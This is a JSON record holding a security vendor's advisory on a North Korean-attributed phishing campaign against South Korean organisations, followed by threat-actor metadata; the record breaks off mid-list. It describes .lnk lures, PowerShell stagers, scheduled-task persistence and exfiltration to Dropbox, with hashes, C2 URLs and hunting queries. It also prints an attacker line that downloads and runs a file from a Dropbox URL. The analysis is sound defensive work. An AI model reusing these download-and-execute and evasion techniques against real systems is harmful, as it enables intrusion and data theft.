{
	"id": "e7eaa557-fec4-4f35-942a-a5bedb9be0db",
	"created_at": "2026-04-06T00:17:26.593411Z",
	"updated_at": "2026-04-10T03:37:40.806768Z",
	"deleted_at": null,
	"sha1_hash": "d7efaadd97ce3dcbbaabda8652cd1ce4467f3b1c",
	"title": "Analyzing DEEP#DRIVE: North Korean Threat Actors Observed Exploiting Trusted Platforms for Targeted Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6858431,
	"plain_text": "Analyzing DEEP#DRIVE: North Korean Threat Actors Observed\r\nExploiting Trusted Platforms for Targeted Attacks\r\nArchived: 2026-04-05 15:44:05 UTC\r\nSecuronix Threat Research Security Advisory\r\nBy Securonix Threat Research: Den Iuzvyk, Tim Peck\r\nFeb 13, 2025\r\ntldr:\r\nThe Securonix Threat Research team has been monitoring an ongoing campaign attributed to Kimsuky targeting\r\nSouth Korean business and government sectors.\r\nThe DEEP#DRIVE attack campaign represents a sophisticated and multi-stage operation targeting South Korean\r\nbusinesses, government entities and cryptocurrency users. Leveraging tailored phishing lures written in Korean\r\nand disguised as legitimate documents, the attackers successfully infiltrated targeted environments as evidenced\r\nby information we were able to obtain on the attacker’s C2 infrastructure (see: Attacker’s Infrastructure).\r\nThe lure documents, themed as work logs, insurance documents and crypto-related files, were carefully crafted to\r\nappeal to their intended audience, increasing the likelihood of successful execution. By using trusted file formats\r\nlike .hwp, .xlsx, and .pptx, as well as widely used platforms like Dropbox for hosting malicious payloads, the\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 1 of 22\n\nattackers bypassed conventional security defenses and ensured their activity blended seamlessly into normal user\r\nbehavior.\r\nThe campaign is heavily reliant on PowerShell scripts for payload delivery, reconnaissance, and execution of next-stage malware. Key elements of the attack included the use of Dropbox to distribute payloads and exfiltrate system\r\ndata. Persistence was established via scheduled tasks, and code obfuscation was used throughout to evade\r\ndetection. 
\r\nWhile the attacker’s infrastructure appears to have been short-lived (evidenced by the rapid takedown of critical\r\nDropbox links) the tactics, techniques, and procedures (TTPs) align closely with Kimsuky, a North Korean\r\nAdvanced Persistent Threat (APT) group known for targeting South Korea and using similar Dropbox-based\r\nmethods in prior campaigns. (see: Victimology and attribution).\r\nKey Findings\r\nPhishing Vector: The attack chain began with a .lnk file disguised as legitimate documents, including\r\nnames such as 종신안내장V02_곽성환D.pdf.pdf.\r\nPersistence Mechanism: The .lnk file created a scheduled task named ChromeUpdateTaskMachine to\r\nensure the periodic execution of malicious scripts.\r\nReconnaissance: Scripts such as system_first.ps1 gathered detailed system information, including IP\r\naddress, OS details, antivirus products and running processes, exfiltrating this data to Dropbox.\r\nPayload execution: The temp.ps1 script downloaded, modified and decompressed a Gzip-compressed\r\n.NET assembly (system_drive.dat). The assembly was loaded directly into memory to invoke the Main\r\nmethod, executing the next-stage payload.\r\nStealth and obfuscation: The attackers attempted to obfuscate their scripts with meaningless variable\r\nnames, repeated irrelevant assignments and string concatenation to evade detection.\r\nC2 dependency: Dropbox served as the hosting platform for payloads. The removal of the associated\r\nDropbox link prevented further analysis of the Main method, suggesting the attack infrastructure was\r\ntemporary or actively monitored.\r\nAlthough we were unable to obtain the original phishing email, we were able to gather a wide range of attached or\r\ndownloaded payloads.  It is evident that phishing was the primary method of malware distribution in this\r\ncampaign as the collected samples and their filenames strongly align with common themes and wording typically\r\nused in phishing lures. 
\r\nFigure 1: DEEP#DRIVE attack chain diagram\r\nThe attack relies on the user downloading a compressed (.zip) file containing a single shortcut file (.lnk). These\r\nshortcut files are crafted to resemble legitimate Microsoft Office documents, PDFs or other commonly used file\r\nformats. Since Windows hides the .lnk extension by default, threat actors exploit this behavior by appending a\r\nfalse extension, such as .xls or .pdf, before the .lnk extension. This tactic deceives users into believing the file is\r\nharmless and encourages them to double-click it, triggering the malware’s execution.\r\nStage 1: Initial PowerShell execution through .lnk files\r\nWe were able to obtain quite a few samples of recent shortcut files being used by the threat actors and they all\r\nappear to follow a common execution strategy. As seen in the figure below, the shortcut file calls the PowerShell\r\nprocess and executes a large string of code.\r\nFigure 2: Shortcut file analysis (NSTU.xls.lnk)\r\nThe embedded PowerShell script is a malicious payload designed to execute silently and relies on obfuscation,\r\nprimarily through Base64 encoding, to hide its true intent. The script begins by decoding a Base64-encoded string\r\nstored in the $ss variable, which holds the next-stage PowerShell code. This decoded content is written to a\r\ntemporary file, user.ps1, in the %APPDATA% directory and executed once again using PowerShell. 
After\r\nexecution, the script ensures stealth by deleting the temporary file.\r\nFigure 3: Shortcut file properties\r\nThe PowerShell command line was intentionally padded with over 100 space characters. As you\r\ncan see in the figure above, this completely removed any visible code in the Target field when viewing file\r\nproperties. It’s possible that padding the code this way is an attempt to confuse log analysis\r\nor AV detection engines, while having no bearing on the success of the code’s execution.\r\nStage 2: Decoded base64 PowerShell code\r\nThis decoded PowerShell script reveals a multi-stage attack strategy relying on file downloads, execution, and\r\npersistence mechanisms. Below is a detailed breakdown of its functionality.\r\nBelow is the decoded content of two unique samples. Overall, the code is very similar, with the only changes being\r\nthe lure document used and the Dropbox URL:\r\nFigure 4: Decoded PowerShell script from the .lnk file (first sample)\r\nFigure 5: Decoded PowerShell script from the .lnk file (second sample)\r\nThe script begins by setting up a temporary path using the variable $hhh to download a file named\r\n“Telegram.exe” or “종신안내장V02_곽성환D.pdf.pdf” from Dropbox. This file is stored in the system’s\r\ntemporary directory. Once downloaded, it is immediately executed using the “\u0026” operator. This opens the lure\r\ndocument to present to the user.\r\nNext, the script prepares a second PowerShell payload, referred to as chrome.ps1, and stores it in the user’s\r\n%AppData% directory. This payload is created using the $str variable and saved temporarily as temp.ps1. 
This\r\nfile contains instructions to download another file, “cjfansgmlans1-x.txt” or “kxsxhx-x.txt”, from Dropbox. Once\r\ndownloaded, the file is executed and its traces are removed with the Remove-Item PowerShell cmdlet.\r\nTo establish persistence, the script creates a scheduled task named “ChromeUpdateTaskMachine”. The scheduled\r\ntask is configured to execute the chrome.ps1 script using PowerShell in a hidden window. The task is triggered\r\nonce, five minutes after the script runs, and repeats every 30 minutes.\r\nThe script concludes with another file download operation. It retrieves kxsxhx-f.txt from Dropbox, saves it as\r\nsystem_first.ps1 in the local %AppData% directory, executes it, and cleans up by deleting the file.\r\nLure file analysis\r\nTaking a closer look at the first script, which downloaded and attempted to execute “Telegram.exe”, we ran into\r\nsome interesting issues. First, the file is actually a .pptx file renamed with a .exe extension. Looking back at the\r\nscript, the file is downloaded and executed as-is, meaning that it is very unlikely that the file, without being\r\nrenamed to a .pptx extension, would actually execute. Renaming “Telegram.exe” to “Telegram.pptx” allows it to\r\nopen properly and display its contents. 
It’s possible that this could have been a mistake by the attackers.\r\n$hhh = Join-Path ([System.IO.Path]::GetTempPath()) \"Telegram.exe\";\r\nwget -Uri \"hxxps://dl.dropboxusercontent[.]com/scl/fi/slx06ol4jmjqn16icggin/.pptx?rlkey=lky2lit5lpthkcscfnz3f91oa\u0026st=gwpkys9h\u0026dl=0\" -OutFile $hhh\r\n\u0026 $hhh;\r\nHowever, moving over to the second sample, where the file “종신안내장V02_곽성환D.pdf.pdf” is downloaded\r\nfrom Dropbox, we didn’t observe any errors in execution.\r\nBelow is a screenshot of the contents of “Telegram.exe(pptx)”.\r\nFigure 6: Phishing lure analysis (Telegram.exe)\r\nThe lure document is written in Korean and appears to cover details related to a safety work plan for forklift\r\noperations at a logistics facility, focusing on safe handling of heavy cargo, operator training and risk\r\nprevention. It appears to be an official guideline document used to ensure compliance with workplace safety\r\nstandards. The attackers may be using a legitimate-looking safety plan to target employees in logistics or related\r\nsectors in South Korea.\r\nStage 3 execution: chrome.ps1\r\nThe purpose of this script is simply to execute the PowerShell script found at\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/nanwt6elsuxziz05hnlt4/cjfansgmlans1-x.txt?rlkey=l6gzro1rswkqbk6tinxnkuylv\u0026st=iv78c1cg\u0026dl=0. This file downloads and executes the final portion of the\r\nscript (temp.ps1), which we’ll highlight further down.\r\nThe file is downloaded and saved to %APPDATA%\\temp.ps1.\r\nFigure 7: contents of chrome.ps1\r\nStage 4: Persistence\r\nThe next action that the original .lnk file performs is establishing persistence on the machine. 
The .lnk file ensures\r\nthis by leveraging Windows scheduled tasks. The malware creates a scheduled task named\r\n“ChromeUpdateTaskMachine”, which is configured to execute the malicious script (chrome.ps1) located in the\r\n%AppData% directory. This is achieved through the PowerShell Register-ScheduledTask cmdlet, which\r\ncombines a task action, a trigger, and specific settings. The task action specifies the execution of PowerShell.exe\r\nwith the necessary arguments to run the chrome.ps1 (temp.ps1) script. The task trigger is set to activate once, five\r\nminutes after its creation, and repeats every 30 minutes. This periodic execution guarantees that the malware runs\r\nat regular intervals, even after reboots.\r\nA few notable details related to the task: to avoid suspicion, the task is configured to run in a hidden window\r\n(using -WindowStyle Hidden) and bypasses PowerShell execution policies with the -ExecutionPolicy Bypass flag,\r\na tactic to evade restrictions that might otherwise block untrusted scripts. By using a name like\r\n“ChromeUpdateTaskMachine”, the attackers masquerade as a legitimate system or browser update task, making the\r\nscheduled task less likely to arouse suspicion.\r\nFigure 8: scheduled task details\r\nStage 5 execution: system_first.ps1\r\nThe final action that the original shortcut file performs is to download and execute another file from Dropbox,\r\nsystem_first.ps1.\r\nThis file is downloaded from\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/3br2y8fin0jqgrunrq3mf/cjfansgmlans1-f.txt?rlkey=rxnknu51ncb5xgnj2lyxu0xyu\u0026st=ohfmyo4p\u0026dl=0 and is stored into the script’s $aaa variable. The contents\r\nof the script are then executed using “ @ $aaa ”. 
This can be seen in the figures in the Stage 2: Decoded base64\r\nPowerShell code section.\r\nThe contents of the PowerShell code found in system_first.ps1 are rather interesting. Let’s dive in to discover its\r\nfunctions. In a nutshell, the script is designed to collect system information, exfiltrate it to Dropbox, and then\r\nclean up by removing the locally generated file.\r\nFigure 9: system_first.ps1 – system enumeration and connection details\r\nThe system_first.ps1 script gathers system information by querying various Windows Management\r\nInstrumentation (WMI) classes and using PowerShell commands to collect key details about the host. It retrieves\r\nthe IP address of the machine by querying Win32_NetworkAdapterConfiguration and captures the system’s last\r\nboot-up time, operating system details (version, build number, and architecture), and antivirus product names\r\nusing Win32_OperatingSystem and SecurityCenter2.AntiVirusProduct.\r\nAlso, the script determines whether the system is a laptop or desktop by checking the PCSystemType attribute in\r\nthe Win32_ComputerSystem class. It also logs the installation date of the operating system and captures all\r\ncurrently running processes on the machine. 
All this information is written to a uniquely named file in the\r\n%AppData% directory, formatted with the IP address, timestamp, and a specific identifier, ready for exfiltration.\r\nAll in all, it gathers comprehensive system information from the victim host, including:\r\nHost IP address\r\nSystem uptime and OS type and version details\r\nInstalled antivirus software\r\nRunning processes\r\nSystem type (desktop or laptop)\r\nFor each compromised system, a file is prepared and uploaded back to Dropbox using the following directory and\r\nnaming structure:\r\n/github/cjfansgmlans1_first/\u003cIP\u003e-\u003ctimestamp\u003e-RRR-cjfansgmlans1.txt\r\nFigure 10: system_first.ps1 – connection details and exfiltration\r\nFinal stage: Assemblies execution – temp.ps1\r\nIf you recall, the temp.ps1 script was downloaded and executed using chrome.ps1, which after execution deletes\r\nitself. It’s designed to execute obfuscated and compressed code fetched from a remote location. Given the\r\ncomplexity of the code, we’ll break it down into individual sections in an effort to understand it better.\r\nThroughout the script, the attackers used mild forms of code obfuscation in order to bypass detections. First, the\r\nattackers broke up common strings into concatenated chunks. Breaking up strings that an antivirus product might\r\nflag on is a common way to bypass detections. Next, the attackers filled the script with junk code (the $ajaia\r\nvariable specifically) in order to confuse analysis. It could also be an attempt to modify the file’s entropy\r\nlevel, which could also assist in bypassing detections.\r\n1. Initiation and staging the execution flow\r\nThe first section of the script focuses on hiding its execution window to avoid alerting the user to its activities. 
It\r\nachieves this by leveraging .NET assemblies and calling the user32.dll library, a Windows API commonly used for\r\ninteracting with graphical user interfaces.\r\nThe script imports two functions, GetForegroundWindow and ShowWindow, from user32.dll. It then identifies the\r\ncurrent foreground window and applies the SW_HIDE flag, which hides the window from view. If the foreground\r\nwindow is successfully hidden, the script outputs “OK.” Otherwise, it outputs “NO.”\r\nFigure 11: temp.ps1 – execution flow\r\n2. Download and prepare the payload\r\nNext, the script downloads a file (V3.rtf) from a Dropbox URL\r\n( hxxps://dl.dropboxusercontent[.]com/scl/fi/ffrwxyw5reunc12416rmp/V3.rtf?rlkey=g4c1z24k0hjnycd1adxcdsvmq\u0026st=mmmhwelp\u0026dl=0temp.ps1 ) and saves it as “system_drive.dat” in the user’s\r\ntemporary directory. In the screenshot of the code below, we can observe the obfuscation types mentioned\r\nearlier: string concatenation and junk code found in the $ajaia variable.\r\nFigure 12: temp.ps1 – download next-stage payload\r\n3. Modify and decompress the payload\r\nAfter downloading, the script reads the file “system_drive.dat” into a byte array. The first few bytes of the file are\r\nmodified to match the Gzip format signature ( 0x1F, 0x8B, 0x08 ). The file is then decompressed using a custom\r\nGzip decompression function ( ggggfff ).\r\nFigure 13: temp.ps1 – decompress payload\r\n4. 
Load and execute the payload\r\nFinally, the decompressed Gzip payload is loaded as a .NET assembly using\r\n[System.Reflection.Assembly]::Load. It then iterates through all types and methods in the assembly to find and\r\ninvoke a method named “Main”. This is where the next-stage code executes, allowing the attackers to run arbitrary\r\nlogic embedded in the payload.\r\nLastly, the script removes the system_drive.dat file from the temporary directory after processing, eliminating\r\nlocal traces of the downloaded payload.\r\nFigure 14: temp.ps1 – execute payload\r\nUnfortunately, we were unable to capture the system_drive.dat file or obtain a memory dump of the PowerShell\r\nprocess to analyze the next-stage payload. At this point it’s safe to assume that the file was most likely a backdoor\r\npayload, allowing remote access to the victim’s computer. We will provide updates as we learn more in the future.\r\nAttacker’s infrastructure and capabilities\r\nThe attacker’s infrastructure relied heavily on trusted cloud services; specifically, Dropbox was used\r\nthroughout the DEEP#DRIVE campaign to host and distribute malicious payloads. By using Dropbox URLs for\r\npayload delivery, such as V3.rtf and other files, the attackers capitalized on the platform’s reputation to evade\r\ndetection and avoid raising suspicion in monitored environments. These methods are preferred by attackers as they\r\ntypically bypass network layer defenses.\r\nThe use of OAuth token-based authentication for Dropbox API interactions allowed seamless exfiltration of\r\nreconnaissance data, such as system information and active processes, to predetermined folders. This cloud-based\r\ninfrastructure demonstrates an effective yet stealthy method of hosting and retrieving payloads, bypassing\r\ntraditional IP or domain blocklists. 
Additionally, the infrastructure appeared dynamic and short-lived, as evidenced\r\nby the rapid removal of key links after the initial stages of the attack, a tactic that not only complicates analysis but\r\nalso suggests the attackers actively monitor their campaigns for operational security.\r\nTaking it a step further…\r\nAs our team had access to the attacker’s OAuth tokens contained in the PowerShell code, we built a script to see\r\nwhat kind of data we could pull. While limited, we were able to get a small peek into the attacker’s infrastructure.\r\nThe most concerning aspect was the sheer amount of system configuration files. If you recall, each victim\r\ngenerates a unique configuration text file (Stage 5) which gets uploaded to the attacker’s Dropbox account inside a\r\n/github/ directory. While there were duplicates, we counted thousands of files, dating back to September of last\r\nyear.\r\nFigure 15: attacker’s infrastructure – victim configuration files\r\nIn addition to victim-related configuration files, we were also able to see all uploaded payloads and stagers. Most\r\nof these were in Korean with a few in English. Contained was a massive grab bag of zip, pdf, xlsx and docx files.\r\nThese tend to follow typical phishing lure nomenclature and file types.\r\nThe figure below shows a portion of the directory listing from the attacker’s Dropbox repository. It strongly supports\r\nour hypothesis that their operations are heavily reliant on phishing campaigns targeting Korean-speaking\r\nindividuals or organizations, as evidenced by the filenames.\r\nFigure 16: attacker’s infrastructure – phishing lures\r\nBelow is a sample of some of the document names, their translation into English, and a description or implication\r\nof the potential phishing lure. 
\r\nDocument title | Translation | Implication\r\n메타마스크.hwp | Metamask.hwp | This may reference the cryptocurrency wallet “Metamask” and could be a phishing lure targeting crypto users.\r\n24년 10 월 업무일지(최철문).xlsx | October 2024 Work Log (Choi Chul-Moon).xlsx | A work-related decoy designed to target employees, possibly impersonating a known individual or organization.\r\n09월 매출현황(국내영업1팀-완주 디스플레이)-파주.xlsx | September Sales Status (Domestic Sales Team 1 – Wanju Display) – Paju.xlsx | This likely targets corporate users in sales or logistics, possibly in the electronics or manufacturing sector.\r\n여비정산서.hwp | Travel Expense Report.hwp | A common decoy document for targeting employees handling expense claims.\r\n지게차 중량물 윙바디 작업계획서.pptx | Forklift Heavy Cargo Wing Body Work Plan.pptx | Used in this campaign. As analyzed earlier, this decoy targets logistics or industrial operations.\r\n메타마스크 니모닉.txt | Metamask Mnemonic.txt | A clear phishing attempt to steal cryptocurrency wallet recovery phrases.\r\n종신안내장V02_곽성환D.pdf.pdf | Lifetime Insurance Guide V02_Gwak Seong-Hwan D.pdf.pdf | Insurance-themed phishing, targeting individuals in finance or policyholders.\r\n제주시정소식(2024. 10. 18.).hwp | Jeju City Administrative News (2024. 10. 18.).hwp | A decoy targeting local government officials or citizens.\r\n회사인력요구사항.pdf | Company Workforce Requirements.pdf | Likely targeting HR or workforce planning teams.\r\n(200만원 이상)수의계약 체결 제한 여부 확인서(서식).hwp | (Contracts Over 2 Million KRW) Restricted Contract Execution Verification Form (Template).hwp | A government or legal decoy targeting administrative personnel handling contracts.\r\nWrapping up…\r\nThe investigation of DEEP#DRIVE revealed an ongoing attack leveraging obfuscated PowerShell scripts and\r\nDropbox-hosted payloads to execute malicious activities. The attackers were well equipped with an already huge\r\npool of potential victims, as we were able to uncover.\r\nThe attack begins with a .lnk file which attempts to trick the user into executing malicious code. The code silently\r\ndownloads and executes PowerShell scripts designed to gather system information, establish persistence and\r\nretrieve additional payloads. The later stages involve downloading, decompressing, and executing a .NET\r\nassembly that contains the next phase of the attack logic. Unfortunately, the Command-and-Control (C2)\r\ninfrastructure appears to have been taken offline, preventing further analysis of the Main method within the\r\npayload.\r\nDespite the missing final stage, the analysis highlights the sophisticated techniques employed, including\r\nobfuscation, stealthy execution, and dynamic file processing, which demonstrate the attacker’s intent to evade\r\ndetection and complicate incident response.\r\nVictimology and attribution\r\nThe language used in the phishing lures strongly indicates that South Korea is the primary target of the\r\nDEEP#DRIVE campaign. 
Based on the content and themes of the lures, the attackers appear to focus on\r\nbusinesses, government entities and cryptocurrency sectors, leveraging tailored lure files to maximize their\r\nchances of success.\r\nHistorically, Kimsuky, a well-documented North Korean threat actor, has demonstrated a consistent focus on\r\nSouth Korea while frequently leveraging Dropbox for their operations. For instance, in March of last year, our\r\nteam identified a campaign dubbed DEEP#GOSU, during which Kimsuky was observed utilizing Dropbox links\r\nfor both payload staging and data exfiltration. Since then, similar tactics involving Dropbox have been observed in\r\nthe wild in other campaigns attributed to Kimsuky. Given these patterns, we assess with high confidence that\r\nKimsuky is the primary Advanced Persistent Threat (APT) group behind these attacks.\r\nSecuronix recommendations\r\nAs this campaign likely started using phishing emails, avoid downloading files or attachments from\r\nexternal sources, especially if the source is unsolicited or urgency is stressed. Malicious payloads\r\nfrom phishing emails can be delivered as direct attachments or as links to external documents to download.\r\nCommon file types include office docs (.pptx, .docx, .xlsx), zip, rar, iso, and pdf.\r\nMaintain vigilance around the use of shortcut files (.lnk). This is a very common code execution tactic with\r\nthreat actors who rely on phishing emails to execute code.\r\nMonitor common malware staging directories, especially script-related activity in world-writable\r\ndirectories. 
In the case of this campaign the threat actors staged their operations out of the C:\\Users\\\u003cusername\u003e\\appdata\\Roaming directory.\r\nWe strongly recommend deploying robust endpoint logging capabilities to aid in PowerShell detections.\r\nThis includes leveraging additional process-level logging such as Sysmon and PowerShell logging for\r\nadditional log detection coverage.\r\nSecuronix customers can scan endpoints using the Securonix hunting queries below.\r\nMITRE ATT\u0026CK Matrix\r\nTactics Techniques\r\nInitial Access T1566.001: Phishing: Spearphishing Attachment\r\nCommand and Control\r\nT1071.001: Application Layer Protocol: Web Protocols\r\nT1132: Data Encoding\r\nDefense Evasion\r\nT1027: Obfuscated Files or Information\r\nT1027.010: Obfuscated Files or Information: Command Obfuscation\r\nT1036: Masquerading\r\nT1036.007: Masquerading: Double File Extension\r\nT1140: Deobfuscate/Decode Files or Information\r\nT1620: Reflective Code Loading\r\nExecution\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nT1059.003: Command and Scripting Interpreter: Windows Command Shell\r\nT1204.002: User Execution: Malicious File\r\nExfiltration\r\nT1102: Web Service\r\nT1567.002: Exfiltration Over Web Service: Exfiltration to Cloud Storage\r\nPersistence T1053.005: Scheduled Task/Job: Scheduled Task\r\nRelevant Securonix detections\r\nPSH-ALL-235-RU\r\nPSH-ALL-316-RU\r\nPSH-ALL-331-RU\r\nWEL-ALL-1227-RU\r\nEDR-ALL-1295-ERR\r\nRelevant hunting queries\r\n(remove square brackets “[ ]” for IP addresses or URLs)\r\nindex = activity AND requesturl CONTAINS \"dl.dropboxusercontent[.]com\" AND (requesturl CONTAINS \"kxsxhx-f.txt\" OR requesturl CONTAINS \"kxsxhx-x.txt\" OR requesturl CONTAINS \"V02_-D.pdf.pdf\" OR requesturl CONTAINS \"241002-2024-GA-10-v2.pdf\" OR requesturl CONTAINS \"cjfansgmlans1-x.txt\" OR requesturl CONTAINS \"cjfansgmlans1-f.txt\" OR requesturl CONTAINS \"V3.rtf\")\r\nindex = activity AND rg_functionality = \"Endpoint Management Systems\" AND requesturl CONTAINS \"dl.dropboxusercontent[.]com\" AND (requesturl CONTAINS \"kxsxhx-f.txt\" OR requesturl CONTAINS \"kxsxhx-x.txt\" OR requesturl CONTAINS \"V02_-D.pdf.pdf\" OR requesturl CONTAINS \"241002-2024-GA-10-v2.pdf\" OR requesturl CONTAINS \"cjfansgmlans1-x.txt\" OR requesturl CONTAINS \"cjfansgmlans1-f.txt\" OR requesturl CONTAINS \"V3.rtf\")\r\nindex = activity AND rg_functionality = \"Microsoft Windows Powershell\" AND scriptblocktext CONTAINS \"dl.dropboxusercontent[.]com\"\r\nC2 and infrastructure\r\nC2 Address\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/slx06ol4jmjqn16icggin/.pptx\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/sumch8o12a4ko7wqqtrgo/kxsxhx-f.txt\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/gs58u6qvvxorzttv09yvt/kxsxhx-x.txt\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/lc7j7be3vtd2f3hadv0bz/V02_-D.pdf.pdf\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/vx23391zdxqu3qirc5z7g/241002-2024-GA-10-v2.pdf\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/nanwt6elsuxziz05hnlt4/cjfansgmlans1-x.txt\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/3br2y8fin0jqgrunrq3mf/cjfansgmlans1-f.txt\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/ffrwxyw5reunc12416rmp/V3.rtf\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/4qmp7p8fkmfwfsltt6imb/0607online.pdf\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/quo63qm8d3iqlhmpyib7p/20240608.bmp\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/p8f846myv0cbs5975uszw/loader.txt\r\nAnalyzed files/hashes\r\nFile Name | SHA256\r\n종신안내장v02_곽성환d.zip | 079907B7FEAB3673A1767DBFBC0626E656F5D3B03B6CFF471CC7CF8A1973AB34\r\n241002-2024년 ga영업본부 담당지점 배분(10월)v2.zip | 8D6DC026812420C5EF4B4FE72FB7067DA14196FEA45B6E99A594126246AC41FC\r\n거래명세서[2024.09].zip | 2849D92E7E188F4B76559B7018D81F6C463388A1B05B2674594F70CF4858C6B3\r\n거래명세서[2024.09].xlsx.lnk | ACBC775087DA23725C3D783311D5F5083C93658DE392C17994A9151447AC2B63\r\n종신안내장V02_곽성환D.pdf.pdf.lnk | 21CEFE1D3FE0C69C32BEBAFCA15D1AD3B17FAE37B11E6B6EFFE155327387A752\r\n241002-2024년 GA영업본부 담당지점 배분(10월)v2.pdf.lnk | 71D56C61B765EEE74DCA65910AB9E0E2B35B21BCF6C97241CA7188A75F082F6F\r\n도양기업 20240610 송장 갑지.bmp.lnk | 44FF60D352169F280801CF2075295AAB0A6151FF8F77B66D16C82776EFCE7FEA\r\n[unknown].pdf.lnk | 1D5D65F2EB065BAC629C82A3399FBDC28EBE33EB288C1CD556CCA6B4E6230B52\r\nTelegram.exe / 지게차 중량물 윙바디 작업계획서.pptx | 074ADA5CC1947EBE5B9ACB7F2DBF0FA599B043661F4FE640D403BDCC8427AFCA\r\nuser.ps1 | CE04F9074A4CC8FA74FABFF5A1FE21439FD8485220321C90BB06F5DBED50170C\r\nuser.ps1 | DB3A5A3A8855A48D2AA3CA2FAEF14E35CB8F3416D10DF9C94576D9B5966DEF3D\r\nuser.ps1 | B960C9DE6714C9951EC21CA685998BA49EB29EF57868E780521B212AD6356E9C\r\nuser.ps1 | 79496BAA4BF17A73006A359E146F02F7A92DD0794A07844064C7268724B98560\r\nuser.ps1 | B2B8D0AE6F521F7405305A7AFBE6D230C0DD22A18C4A852A6B69D9E54513E248\r\nuser.ps1 | 6154932EF81ED274C492F55775713B25A54676E283932B9048718C1B4A837F65\r\nuser.ps1 | 47DFA0061FDB021F3CEFE62AC8198733BE5ADCB756F6042CA62EFDC4F2502E97\r\nsystem_first.ps1 | FE84A4A119917F15418659ED30699D873B6445AA053D9303287B085E35BF1002\r\nsystem_first.ps1 | 8E51819E39E4FC73D71B31E49B6775E47EE3B11AF1FD9EB48A1E7D49DAD62BC0\r\ntemp.ps1 | DB6315274DC31BEA8F42C79EA8928A4BE2A5DD996C3E7A702F6A2BAC5C463FEE\r\nchrome.ps1 | 8CDD557CFF23CA7DDC3CF229F3B6D755878BF7AA864DD4E9D58E590B436987E5\r\nchrome.ps1 | D28E8041A0445271723842FA1D400B5B2AA93DA4DFCD68B1C763774C870DC3B1\r\nchrome.ps1 | 5171917E58A4E795A5E911F82560FA9B5C8F3D62EFD4054BF58A2579E78B76D7\r\nchrome.ps1 | 38B1CFB982C85AE89DA19BE83D502263C11DA1C1A5997E0F15DE2E5580D2161A\r\nReferences:\r\n1. Analysis of New DEEP#GOSU Attack Campaign Likely Associated with North Korean Kimsuky Targeting\r\nVictims with Stealthy Malware\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-new-deepgosu-attack-campaign/\r\n2. Kimsuky organization uses Dropbox cloud to implement action analysis\r\nhttps://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ%3D%3D\u0026mid=2247522061\u0026idx=1\u0026sn=22e56ee213d9e5229371ad3e082ebfab\r\n3. North Korean Advanced Persistent Threat Focus: Kimsuky\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa20-301a\r\nSource: https://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/"
	],
	"report_names": [
		"analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks"
	],
	"threat_actors": [
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
